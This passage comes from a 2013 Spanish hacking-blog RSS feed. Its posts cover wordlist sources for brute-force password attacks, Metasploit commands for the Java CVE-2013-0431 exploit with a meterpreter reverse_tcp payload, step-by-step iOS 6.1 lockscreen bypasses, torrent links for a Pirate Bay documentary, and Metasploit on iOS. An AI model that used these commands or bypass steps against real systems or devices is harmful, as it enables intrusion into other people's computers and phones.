  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.gz&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="60" style="height: 45.0pt;"&gt;
  &lt;td class="xl74" height="60" style="border-top: none; height: 45.0pt; width: 30pt;" width="40"&gt;6°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/" target="_blank"&gt;ftp.cerias.purdue.edu&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;FTP
  muy parecido a los 2 anteriores que trae consigo entre sus variedades:
  idiomas, literatura, movieTV, lugares, nombres, random, religión, computador,
  ciencia.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.gz&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="80" style="height: 60.0pt;"&gt;
  &lt;td class="xl74" height="80" style="border-top: none; height: 60.0pt; width: 30pt;" width="40"&gt;7°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://contest.korelogic.com/wordlists.html" target="_blank"&gt;contest.korelogic.com&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Aquí
  se pueden encontar diccionarios con 2 letras de combinaciones, nombres de
  ciudades, equipos de football, nombres sacados de Facebook, palabras sacadas
  de la Wiki (según idioma), etc...&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.dic
  *.dic.gz *.txt&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl74" height="20" style="border-top: none; height: 15.0pt; width: 30pt;" width="40"&gt;8°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://www.leetupload.com/dbindex2/index.php?dir=Word%20Lists/" target="_blank"&gt;www.leetupload.com&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Este
  es otro servidor con recopilación de diccinarios.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.zip
  *.rar *.txt&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl74" height="20" style="border-top: none; height: 15.0pt; width: 30pt;" width="40"&gt;9°&lt;/td&gt;
  &lt;td class="xl68" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="ftp://ftp.funet.fi/pub/unix/security/dictionaries/" target="_blank"&gt;ftp.funet.fi&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl65" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;FTP
  con diccionarios por idiomas.&lt;/td&gt;
  &lt;td class="xl75" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.Z
  *&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="41" style="height: 30.75pt;"&gt;
  &lt;td class="xl80" height="41" style="border-top: none; height: 30.75pt; width: 30pt;" width="40"&gt;10°&lt;/td&gt;
  &lt;td class="xl81" style="border-left: none; border-top: none; width: 123pt;" width="164"&gt;&lt;a href="http://wordlist.sourceforge.net/" target="_blank"&gt;wordlist.sourceforge.net&lt;/a&gt;&lt;/td&gt;
  &lt;td class="xl82" style="border-left: none; border-top: none; width: 295pt;" width="393"&gt;Aquí
  hay una recopilación muy poco completa, pero útil igual.&lt;/td&gt;
  &lt;td class="xl83" style="border-left: none; border-top: none; width: 88pt;" width="117"&gt;*.tar.gz
  *.zip&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/HU1tqSrTzkQ" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-05T21:16:27.120-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-HRxc-sP2omA/UTaI1Fj1ppI/AAAAAAAAB6Y/hE1Cnm5zn1s/s72-c/Brute+Force.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/03/diccionarios-para-realizar-ataques-de.html</feedburner:origLink></item><item><title>Otro 0day en Java permite Ejecución de Código Remoto (Video MSF) </title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/n5y_pwIL4wM/otro-0day-en-java-permite-ejecucion-de.html</link><category>Java</category><category>Bug</category><category>Seguridad Web</category><category>0-day</category><category>Metasploit</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 25 Feb 2013 19:18:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7637033749053807818</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-lojrbHL67FM/USwnZZFAKAI/AAAAAAAAB5U/pbw42YRSDfE/s1600/java-0-day.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="188" src="http://2.bp.blogspot.com/-lojrbHL67FM/USwnZZFAKAI/AAAAAAAAB5U/pbw42YRSDfE/s320/java-0-day.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace más de un mes que se publicó un &lt;a href="http://www.blackploit.com/2013/01/grave-0day-en-java-permite-ejecucion-de.html" target="_blank"&gt;&lt;b&gt;Grave 0day en Java que permitía la Ejecución de Código Remoto&lt;/b&gt;&lt;/a&gt;. Lo cual fue noticia mundial ya que grandes empresas como Apple recomendaron dejar de usar Java, e incluso el gobierno de EEUU llamó a desinstalar por completo Java, ya que era una amenaza real y latente que se dilató en parchar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente (18-01-2013) fue descubierta una nueva vulnerabilidad (CVE-2013-0431 Java Applet JMX Remote Code Execution) que es muy parecida a la anterior (incluso parece ser una secuela) que nuevamente afecta al SandBox.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
La versiones afectadas son &lt;b&gt;Java SE 7 Update 11&lt;/b&gt; y anteriores, ya está parcahdo oficialmente, pero aun existen una gran mayoría que todavía no actualiza Java.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lo chicos de Metasploit han hecho un trabajo sorprendente como siempre, y ya han publicado (el 25-02-2013) el módulo que explota la vulnerabilidad, aquí un video demostrativo:&lt;br /&gt;&lt;br /&gt;
&lt;center&gt;

&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;iframe width="700" height="394" src="http://www.youtube.com/embed/6EHQXjDYBhQ" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;b&gt;Video:&lt;/b&gt; &lt;a href="http://eromang.zataz.com/2013/02/25/cve-2013-0431-java-applet-jmx-remote-code-execution-metasploit-demo/" target="_blank"&gt;http://eromang.zataz.com/&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/n5y_pwIL4wM" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-26T00:18:09.755-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-lojrbHL67FM/USwnZZFAKAI/AAAAAAAAB5U/pbw42YRSDfE/s72-c/java-0-day.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/02/otro-0day-en-java-permite-ejecucion-de.html</feedburner:origLink></item><item><title>Saltándose la Contraseña de un iOS 6.1 (Forma II) (Video)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/GSsCQ44H0QQ/saltandose-la-contrasena-de-un-ios-61_25.html</link><category>Tips</category><category>Trucos</category><category>Bug</category><category>Hack Tips</category><category>Noticias</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Tue, 26 Feb 2013 06:06:32 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7655969631908816378</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-PVVEYtCuYtE/USwYsv98VcI/AAAAAAAAB4I/EhNF_m8ZpRM/s1600/iOS6.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-PVVEYtCuYtE/USwYsv98VcI/AAAAAAAAB4I/EhNF_m8ZpRM/s1600/iOS6.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace muy poco en la entrada &lt;a href="http://www.blackploit.com/2013/02/saltandose-la-contrasena-de-un-ios-61.html" target="_blank"&gt;&lt;b&gt;Saltándose la Contraseña de un iOS 6.1 (Video)&lt;/b&gt;&lt;/a&gt; se exponía como bypassear la contraseña de un dispositivo con iOS 6.1, pero recientemente me entero por &lt;a href="http://www.cyberhades.com/2013/02/26/otra-forma-de-saltarse-la-pantalla-de-bloqueo-de-ios-6-1/" target="_blank"&gt;&lt;b&gt;Cyberhades&lt;/b&gt;&lt;/a&gt; que existe otro método para saltarse la pantalla de bloqueo de iOS 6.1, que es muy parecido al anterior, pero esta vez se conecta el teléfono vía USB y se puede volcar los datos (sincronizar con iTunes) del terminal.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;b&gt;El procedimiento es el siguiente:&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="float:right; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;ol style="text-align: justify;"&gt;
&lt;li&gt;Pulsa el botón de encendido.&lt;/li&gt;
&lt;li&gt;Llamada de emergencia&lt;/li&gt;
&lt;li&gt;Llama a cualquier número (3 dígitos sólo?) y cancela la llamada inmediatamente&lt;/li&gt;
&lt;li&gt;Pulsa de nuevo el botón de encendido y justo después pulsa el botón del terminal (cuadrado).&lt;/li&gt;
&lt;li&gt;Ahora pulsa el botón de encendido de nuevo por 3 segundos, al tercer segundo pulsa el botón de teléfono y manteniendo éste pulsado, toca el botón de emergencia.&lt;/li&gt;
&lt;li&gt;Una vez que tienes los 3 botones pulsados, suelta el del teléfono (cuadrado) y después el de encendido.&lt;/li&gt;
&lt;li&gt;En este momento si has seguido los pasos correctamente, la pantalla se habrá puesto en negra.&lt;/li&gt;
&lt;li&gt;Conecta tu terminal vía USB a tu sistema y espera que se sincronicen las fotos, contacto, etc sin necesidad de introducir ningún código PIN.&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: justify;"&gt;
&lt;u&gt;&lt;b&gt;Video demostrativo:&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe width="700" height="525" src="http://www.youtube.com/embed/oKOj0GMf810" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt; &lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt;&lt;a href="http://arstechnica.com/apple/2013/02/researchers-find-yet-another-way-to-get-around-ios-6-1-passcode/" target="_blank"&gt;http://arstechnica.com/&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Vía:&lt;/b&gt; &lt;a href="http://www.cyberhades.com/2013/02/26/otra-forma-de-saltarse-la-pantalla-de-bloqueo-de-ios-6-1/" target="_blank"&gt;http://www.cyberhades.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Actualización:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por &lt;a href="http://www.seguridadapple.com/2013/02/no-ha-salido-otra-forma-de-saltarse-el.html" target="_blank"&gt;Seguridad Apple&lt;/a&gt; nos enteramos que este método solo sirve si alguna vez habías hecho "&lt;i&gt;&lt;b&gt;pairing&lt;/b&gt;&lt;/i&gt;" antes entre el dispositivo y tu &lt;i&gt;&lt;b&gt;Apple iTunes&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;i&gt;En el vídeo se puede comprobar que el terminal está "&lt;b&gt;pairing&lt;/b&gt;" con la computadora que está utilizando, es decir, que &lt;b&gt;Apple iTunes&lt;/b&gt;
 ya tiene guardadas las claves de una conexión anterior desbloqueada, 
por lo que no está consiguiendo desbloquear el sistema de ficheros - a 
pesar de que hayan dejando la pantalla en negro &lt;a href="http://www.seguridadapple.com/2013/02/saltar-passcode-en-pantalla-de-bloqueo.html"&gt;por culpa del fallo conocido&lt;/a&gt; -. &lt;/i&gt;&lt;/blockquote&gt;
&lt;/div&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/GSsCQ44H0QQ" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-26T11:06:32.026-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-PVVEYtCuYtE/USwYsv98VcI/AAAAAAAAB4I/EhNF_m8ZpRM/s72-c/iOS6.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/02/saltandose-la-contrasena-de-un-ios-61_25.html</feedburner:origLink></item><item><title>The Pirate Bay - Away From Keyboard (Documental, Subtítulos en Español)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/GyjWgNJOiqc/the-pirate-bay-away-from-keyboard.html</link><category>Video</category><category>Documental</category><category>Noticias</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 23 Feb 2013 10:50:00 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2265318022063611638</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-RKiweN3li2o/USfWii4QvzI/AAAAAAAAB20/mv_9rqvVmHs/s1600/The+Pirate+Bay+-+Away+From+Keyboard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="312" src="http://4.bp.blogspot.com/-RKiweN3li2o/USfWii4QvzI/AAAAAAAAB20/mv_9rqvVmHs/s640/The+Pirate+Bay+-+Away+From+Keyboard.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Acabo de ver este documental que salió hace poco en Inglés, y ahora se encuentra subtitulado. En este se relata el mundo que envuelve a &lt;a href="http://thepiratebay.se/" target="_blank"&gt;The Pirate Bay&lt;/a&gt;, en donde se muestra el &lt;a href="http://en.wikipedia.org/wiki/The_Pirate_Bay_trial" target="_blank"&gt;caso judicial&lt;/a&gt; contra &lt;b&gt;TPB&lt;/b&gt;, que incluye sentencias, apelaciones y redadas,
que se convirtió en poco tiempo en uno de los acontecimientos más 
relevantes en el debate sobre los derechos de propiedad
 intelectual y el intercambio libre de archivos, como lo fueron el caso de &lt;b&gt;Napster&lt;/b&gt; hace más de una década atrás y los últimos sucesos con &lt;b&gt;Kim Dot Com&lt;/b&gt; o la muerte de &lt;b&gt;Aaron Swartz&lt;/b&gt; hace unas pocas semanas.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El nombre del documental se basa en que lo integrantes de TPB prefieren llamar a los 
encuentros físicos "&lt;b&gt;AFK&lt;/b&gt;", &lt;i&gt;&lt;b&gt;Away from Keyboard&lt;/b&gt;&lt;/i&gt; en vez de&amp;nbsp;&amp;nbsp; "&lt;b&gt;IRL&lt;/b&gt;" (&lt;i&gt;In Real Life&lt;/i&gt;), 
porque ellos consideran que Internet también es real. El documental dura 1 hora y 20 minutos, pero les recomiendo 100% que lo vean:&lt;/div&gt;
&lt;br /&gt;


&lt;div style="text-align: center;"&gt;
&lt;iframe width="700" height="394" src="http://www.youtube.com/embed/41rwckQQ0lA" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;
 &lt;/div&gt;

&lt;div style="float:left; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;


&lt;div style="text-align: justify;"&gt;
También disponible vía torrent:&lt;br /&gt;
&lt;a href="https://thepiratebay.se/user/SimonKlose/"&gt;https://thepiratebay.se/user/SimonKlose/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Descargar The Pirate Bay&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por otro lado y hablando del mismo tema, los mismo chicos de &lt;b&gt;TPB&lt;/b&gt; han liberado 2 archivos con un respaldo completo del sitio &lt;a href="http://thepiratebay.se/" target="_blank"&gt;The Pirate Bay&lt;/a&gt;, el primer archivo está optimizado y pesa solamente &lt;b&gt;76 MB&lt;/b&gt;, contiene solamente los nombres y los torrent links, lo puedes descargar de &lt;b&gt;&lt;a href="http://thepiratebay.se/torrent/8156416" target="_blank"&gt;aquí&lt;/a&gt;&lt;/b&gt;. El segundo archivo es lo mismo, pero este contiene toda la información de los seeders y leechers (los que están descargando en ese momento), nombres, torrent links, descripción, tamaño y comentarios, pesa &lt;b&gt;631 MB&lt;/b&gt; y lo pueden descargar de &lt;a href="http://thepiratebay.se/torrent/8163015" target="_blank"&gt;&lt;b&gt;aquí&lt;/b&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/GyjWgNJOiqc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-23T15:50:00.237-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-RKiweN3li2o/USfWii4QvzI/AAAAAAAAB20/mv_9rqvVmHs/s72-c/The+Pirate+Bay+-+Away+From+Keyboard.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/02/the-pirate-bay-away-from-keyboard.html</feedburner:origLink></item><item><title>Cómo Instalar Metasploit en iOS 6.1 (Video)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/gSV4zawzuCs/como-instalar-metasploit-en-ios-61-video.html</link><category>Mac OS</category><category>Video</category><category>Tips</category><category>Hack Tips</category><category>Metasploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 22 Feb 2013 13:04:37 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1270016950440635202</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ew875UtTN8U/USfcOal0uwI/AAAAAAAAB3E/f8knbOK7fog/s1600/Metasploit_iPhone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="352" src="http://3.bp.blogspot.com/-ew875UtTN8U/USfcOal0uwI/AAAAAAAAB3E/f8knbOK7fog/s640/Metasploit_iPhone.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ew875UtTN8U/USfcOal0uwI/AAAAAAAAB3E/f8knbOK7fog/s1600/Metasploit_iPhone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si tienes un Ipad o un Iphon este vídeo te puede interesar. Recientemente &lt;b&gt;&lt;a href="https://twitter.com/Japtron" target="_blank"&gt;Japtron&lt;/a&gt; &lt;/b&gt;(Gracias por su contribución) me ha enviado un vídeo donde explica fácilmente como &lt;b&gt;instalar Metasploit en un dispositivo con iOS 6.1&lt;/b&gt;.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin más que decir les dejo con el vídeo:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;

&lt;div style="text-align: center;"&gt;
&lt;iframe width="680" height="510" src="http://www.youtube.com/embed/5Df3_UAqV1o" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;



&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/gSV4zawzuCs" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-22T18:04:37.673-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-ew875UtTN8U/USfcOal0uwI/AAAAAAAAB3E/f8knbOK7fog/s72-c/Metasploit_iPhone.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/02/como-instalar-metasploit-en-ios-61-video.html</feedburner:origLink></item><item><title>Saltándose la Contraseña de un iOS 6.1 (Video)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/yb_I7W1NwJ8/saltandose-la-contrasena-de-un-ios-61.html</link><category>Tips</category><category>Trucos</category><category>Hack Tips</category><category>Noticias</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Tue, 19 Feb 2013 14:54:17 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2189827719285105501</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://1.bp.blogspot.com/-hOL67aDoPiw/USQANaJDjBI/AAAAAAAAB10/OgdsnoNswLA/s1600/iOS+6.1+lockscreen+bypass.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-hOL67aDoPiw/USQANaJDjBI/AAAAAAAAB10/OgdsnoNswLA/s320/iOS+6.1+lockscreen+bypass.jpg" width="220" /&gt;&lt;/a&gt;Recientemente se ha descubierto una manera de saltarse la pantalla de bloqueo (lockscreen) que tiene una contraseña numérica de 4 dígitos (como se ve en la imagen) de los dispositivos Apple (como el iPhone) con&amp;nbsp; &lt;b&gt;iOS versión 6.1 &lt;/b&gt;(la última versión) y de esa manera poder acceder al dispositivo sin haber ingresado ningún tipo de contraseña o passcode.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El método consta en &lt;i&gt;&lt;b&gt;hacer una llamada de emergencia, colgar y luego pulsar el botón de encendido hasta que se apague la pantalla, soltarlo y luego&amp;nbsp; volver a pulsar dicho botón otra vez y desbloquear&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esto salta el sistema del terminal donde se puse acceder a las aplicaciones, ver y modificar contactos, acceder al buzón de voz y acceder a las fotos a través de añadir un nuevo contacto (seleccionar foto para el nuevo contacto).&lt;/div&gt;
&lt;br /&gt;
Aquí 2 vídeos de demostración:&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;
&lt;br /&gt;&lt;/div&gt;

&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;

&lt;br /&gt;
&lt;div style="text-align: center;"&gt;

&lt;p&gt;&lt;iframe width="500" height="375" src="http://www.youtube.com/embed/MDkLpj3MM-c?feature=oembed" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/p&gt;
&lt;p&gt;&lt;iframe width="500" height="281" src="http://www.youtube.com/embed/MP-w436CfvQ?feature=oembed" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/p&gt;

 &lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Este fallo es muy semejante a uno que afectó a la &lt;a href="http://www.engadget.com/2010/10/25/ios-4-1-glitch-lets-you-bypass-lock-screen-to-access-phone-app/" target="_blank"&gt;versión 4.1 de iOS&lt;/a&gt; hace algún tiempo, pero que al parecer vuelve a surgir.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
